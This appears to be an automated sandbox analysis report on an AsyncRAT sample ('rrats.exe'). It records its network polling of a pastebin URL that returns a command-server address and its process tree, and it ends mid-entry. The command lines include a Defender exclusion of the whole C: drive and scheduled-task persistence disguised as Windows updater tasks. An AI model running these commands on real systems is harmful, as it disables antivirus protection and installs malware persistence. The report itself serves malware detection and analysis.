                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:12 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53ed33b2b43b5-EWR
                                                            2024-12-09 13:12:12 UTC20INData Raw: 66 0d 0a 31 39 34 2e 36 37 2e 32 30 34 2e 37 3a 38 38 0d 0a
                                                            Data Ascii: f194.67.204.7:88
                                                            2024-12-09 13:12:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549769172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:12:43 UTC74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-12-09 13:12:43 UTC391INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: EXPIRED
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53f978908423a-EWR
                                                            2024-12-09 13:12:43 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549795172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:12:52 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:12:53 UTC395INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:12:52 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 9
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53fd249944402-EWR
                                                            2024-12-09 13:12:53 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:12:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549819172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:01 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:02 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:02 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 19
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5400bbd2bc439-EWR
                                                            2024-12-09 13:13:02 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549844172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:11 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:11 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:11 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 28
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540458cac8cdc-EWR
                                                            2024-12-09 13:13:11 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549869172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:20 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:20 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:20 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 37
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5407ecc2bc32d-EWR
                                                            2024-12-09 13:13:20 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549894172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:29 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:29 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:29 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 46
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540b8092f0f78-EWR
                                                            2024-12-09 13:13:29 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549919172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:38 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:38 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:38 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 55
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540f16b119e16-EWR
                                                            2024-12-09 13:13:38 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549942172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:48 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:48 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:48 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 65
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5412ced860f70-EWR
                                                            2024-12-09 13:13:48 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549968172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:13:57 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:13:57 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:13:57 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 74
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54166fb16421c-EWR
                                                            2024-12-09 13:13:57 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:13:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549994172.67.19.244437356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-09 13:14:06 UTC50OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            2024-12-09 13:14:06 UTC396INHTTP/1.1 200 OK
                                                            Date: Mon, 09 Dec 2024 13:14:06 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 83
                                                            Last-Modified: Mon, 09 Dec 2024 13:12:43 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541a0090d185d-EWR
                                                            2024-12-09 13:14:06 UTC8INData Raw: 33 0d 0a 30 3a 30 0d 0a
                                                            Data Ascii: 30:0
                                                            2024-12-09 13:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:08:11:54
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\Desktop\rrats.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\rrats.exe"
                                                            Imagebase:0xca0000
                                                            File size:506'223 bytes
                                                            MD5 hash:A2BDB024C98B7E8D3D06FC86E110D204
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:08:11:55
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:a.exe -p1234
                                                            Imagebase:0xe80000
                                                            File size:308'705 bytes
                                                            MD5 hash:7107F3FB53F9F3EAF3B95FD857F7AEE9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 17%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:08:11:56
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe"
                                                            Imagebase:0x200000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:08:11:57
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                            Imagebase:0x170000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:08:12:01
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:timeout 3
                                                            Imagebase:0x620000
                                                            File size:25'088 bytes
                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:08:12:03
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Imagebase:0x7a0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Explorer.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Has exited:false

                                                            General

                                                            Target ID:17
                                                            Start time:08:12:04
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Explorer.exe"
                                                            Imagebase:0xfe0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:23
                                                            Start time:08:12:08
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                                                            Imagebase:0x2e0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:24
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Users\user\AppData\Local\explore.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\explore.exe
                                                            Imagebase:0xcf0000
                                                            File size:67'584 bytes
                                                            MD5 hash:3D91C31A52BE4E262F7F18272294ED99
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\explore.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 82%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
                                                            Imagebase:0x7ff78f3a0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
